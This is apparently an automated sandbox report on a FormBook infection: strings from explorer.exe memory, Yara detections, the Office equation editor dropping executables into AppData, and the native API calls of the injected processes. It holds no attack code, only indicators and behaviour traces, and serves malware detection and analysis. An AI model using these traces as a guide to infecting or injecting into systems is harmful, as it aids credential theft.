          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.it/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.pl/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.ru/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.google.si/
          Source: explorer.exe, 00000007.00000000.2144811362.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.iask.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2145415051.0000000003E27000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
          Source: explorer.exe, 00000007.00000000.2151899014.0000000004B50000.00000002.00000001.sdmpString found in binary or memory: http://www.iis.fhg.de/audioPA
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.kkbox.com.tw/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.linternaute.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.maktoob.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolibre.com.mx/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mercadolivre.com.br/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.merlin.com.pl/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/?ref=IE8Activity
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BV.aspx?ref=IE8Activity&amp;a=
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/BVPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/Default.aspx?ref=IE8Activity
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.microsofttranslator.com/DefaultPrev.aspx?ref=IE8Activity
          Source: explorer.exe, 00000007.00000000.2147725228.00000000041AD000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/?ocid=iehp
          Source: explorer.exe, 00000007.00000000.2147725228.00000000041AD000.00000004.00000001.sdmpString found in binary or memory: http://www.msn.com/de-de/?ocid=iehp
          Source: explorer.exe, 00000007.00000000.2144811362.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.mtv.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.myspace.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.najdi.si/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nate.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.neckermann.de/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.news.com.au/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.nifty.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ocn.ne.jp/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.orange.fr/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.otto.de/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozon.ru/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ozu.es/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.paginasamarillas.es/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.pchome.com.tw/favicon.ico
          Source: explorer.exe, 00000007.00000000.2144419097.00000000039F4000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleaner
          Source: explorer.exe, 00000007.00000000.2180035893.000000000856E000.00000004.00000001.sdmpString found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.priceminister.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rakuten.co.jp/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rambler.ru/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.recherche.aol.fr/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.rtl.de/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.servicios.clarin.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.shopzilla.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sify.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.so-net.ne.jp/share/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.sogou.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.soso.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.t-online.de/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.taobao.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.target.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tchibo.de/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tesco.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.timesonline.co.uk/img/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.tiscali.it/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.univision.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.walmart.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2144811362.0000000003C40000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.ya.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www.yam.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://www3.fnac.com/favicon.ico
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://xml-us.amznxslt.com/onca/xml?Service=AWSECommerceService&amp;Version=2008-06-26&amp;Operation
          Source: explorer.exe, 00000007.00000000.2189954797.000000000A3E9000.00000008.00000001.sdmpString found in binary or memory: http://z.about.com/m/a08.ico
          Source: explorer.exe, 00000007.00000000.2147725228.00000000041AD000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBSKZM1Y&prvid=77%2
          Source: explorer.exe, 00000007.00000000.2179041046.000000000842E000.00000004.00000001.sdmp, explorer.exe, 00000007.00000000.2180621064.000000000861C000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1
          Source: explorer.exe, 00000007.00000000.2179041046.000000000842E000.00000004.00000001.sdmpString found in binary or memory: https://contextual.media.net/medianet.php?cid=8CUT39MWR&crid=715624197&size=306x271&https=1LMEM

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 0000000C.00000002.2389941869.0000000000330000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000F.00000002.2233553109.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.2389745948.0000000000120000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000C.00000002.2389888753.0000000000280000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000010.00000002.2299563843.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2203096098.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2203049931.0000000000330000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000006.00000002.2203016993.0000000000300000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 16.2.firefos.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.firefos.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 15.2.firefos.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 16.2.firefos.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.skypound83892.exe.400000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 6.2.skypound83892.exe.400000.1.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 0000000C.00000002.2389941869.0000000000330000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.2389941869.0000000000330000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000F.00000002.2233553109.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000F.00000002.2233553109.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.2389745948.0000000000120000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.2389745948.0000000000120000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0000000C.00000002.2389888753.0000000000280000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0000000C.00000002.2389888753.0000000000280000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000010.00000002.2299563843.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000010.00000002.2299563843.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.2203096098.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.2203096098.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.2203049931.0000000000330000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.2203049931.0000000000330000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.2203016993.0000000000300000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.2203016993.0000000000300000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 16.2.firefos.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 16.2.firefos.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 15.2.firefos.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 15.2.firefos.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 15.2.firefos.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 15.2.firefos.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 16.2.firefos.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 16.2.firefos.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.skypound83892.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.skypound83892.exe.400000.1.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.skypound83892.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.skypound83892.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Office equation editor drops PE fileShow sources
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\skypoundx[1].exeJump to dropped file
          Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Roaming\skypound83892.exeJump to dropped file
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeMemory allocated: 76E20000 page execute and read and writeJump to behavior
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeMemory allocated: 76D20000 page execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEMemory allocated: 76E20000 page execute and read and write
          Source: C:\Windows\SysWOW64\NAPSTAT.EXEMemory allocated: 76D20000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeMemory allocated: 76E20000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Firefoxe\firefos.exeMemory allocated: 76D20000 page execute and read and write
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_004181C0 NtCreateFile,6_2_004181C0
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_00418270 NtReadFile,6_2_00418270
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_004182F0 NtClose,6_2_004182F0
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_004183A0 NtAllocateVirtualMemory,6_2_004183A0
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_004181BB NtCreateFile,6_2_004181BB
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0041826B NtReadFile,6_2_0041826B
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_004182EA NtClose,6_2_004182EA
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0041839D NtAllocateVirtualMemory,6_2_0041839D
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_009400C4 NtCreateFile,LdrInitializeThunk,6_2_009400C4
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_00940048 NtProtectVirtualMemory,LdrInitializeThunk,6_2_00940048
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_00940078 NtResumeThread,LdrInitializeThunk,6_2_00940078
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_009407AC NtCreateMutant,LdrInitializeThunk,6_2_009407AC
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0093F9F0 NtClose,LdrInitializeThunk,6_2_0093F9F0
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0093F900 NtReadFile,LdrInitializeThunk,6_2_0093F900
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0093FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,6_2_0093FAD0
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0093FAE8 NtQueryInformationProcess,LdrInitializeThunk,6_2_0093FAE8
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0093FBB8 NtQueryInformationToken,LdrInitializeThunk,6_2_0093FBB8
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0093FB68 NtFreeVirtualMemory,LdrInitializeThunk,6_2_0093FB68
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0093FC90 NtUnmapViewOfSection,LdrInitializeThunk,6_2_0093FC90
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0093FC60 NtMapViewOfSection,LdrInitializeThunk,6_2_0093FC60
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0093FD8C NtDelayExecution,LdrInitializeThunk,6_2_0093FD8C
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0093FDC0 NtQuerySystemInformation,LdrInitializeThunk,6_2_0093FDC0
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0093FEA0 NtReadVirtualMemory,LdrInitializeThunk,6_2_0093FEA0
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0093FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,6_2_0093FED0
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0093FFB4 NtCreateSection,LdrInitializeThunk,6_2_0093FFB4
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_009410D0 NtOpenProcessToken,6_2_009410D0
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_00940060 NtQuerySection,6_2_00940060
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_009401D4 NtSetValueKey,6_2_009401D4
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0094010C NtOpenDirectoryObject,6_2_0094010C
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_00941148 NtOpenThread,6_2_00941148
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0093F8CC NtWaitForSingleObject,6_2_0093F8CC
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_00941930 NtSetContextThread,6_2_00941930
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0093F938 NtWriteFile,6_2_0093F938
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0093FAB8 NtQueryValueKey,6_2_0093FAB8
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0093FA20 NtQueryInformationFile,6_2_0093FA20
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0093FA50 NtEnumerateValueKey,6_2_0093FA50
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0093FBE8 NtQueryVirtualMemory,6_2_0093FBE8
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0093FB50 NtCreateKey,6_2_0093FB50
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0093FC30 NtOpenProcess,6_2_0093FC30
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_00940C40 NtGetContextThread,6_2_00940C40
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0093FC48 NtSetInformationFile,6_2_0093FC48
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_00941D80 NtSuspendThread,6_2_00941D80
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0093FD5C NtEnumerateKey,6_2_0093FD5C
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0093FE24 NtWriteVirtualMemory,6_2_0093FE24
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0093FFFC NtCreateProcessEx,6_2_0093FFFC
          Source: C:\Users\user\AppData\Roaming\skypound83892.exeCode function: 6_2_0093FF34 NtQueueApcThread,6_2_0093FF34
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_021400C4 NtCreateFile,LdrInitializeThunk,12_2_021400C4
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_021407AC NtCreateMutant,LdrInitializeThunk,12_2_021407AC
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0213FAB8 NtQueryValueKey,LdrInitializeThunk,12_2_0213FAB8
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0213FAD0 NtAllocateVirtualMemory,LdrInitializeThunk,12_2_0213FAD0
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0213FAE8 NtQueryInformationProcess,LdrInitializeThunk,12_2_0213FAE8
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0213FB50 NtCreateKey,LdrInitializeThunk,12_2_0213FB50
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0213FB68 NtFreeVirtualMemory,LdrInitializeThunk,12_2_0213FB68
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0213FBB8 NtQueryInformationToken,LdrInitializeThunk,12_2_0213FBB8
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0213F900 NtReadFile,LdrInitializeThunk,12_2_0213F900
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0213F9F0 NtClose,LdrInitializeThunk,12_2_0213F9F0
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0213FED0 NtAdjustPrivilegesToken,LdrInitializeThunk,12_2_0213FED0
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0213FFB4 NtCreateSection,LdrInitializeThunk,12_2_0213FFB4
          Source: C:\Windows\SysWOW64\NAPSTAT.EXECode function: 12_2_0213FC60 NtMapViewOfSection,LdrInitializeThunk,12_2_0213FC60
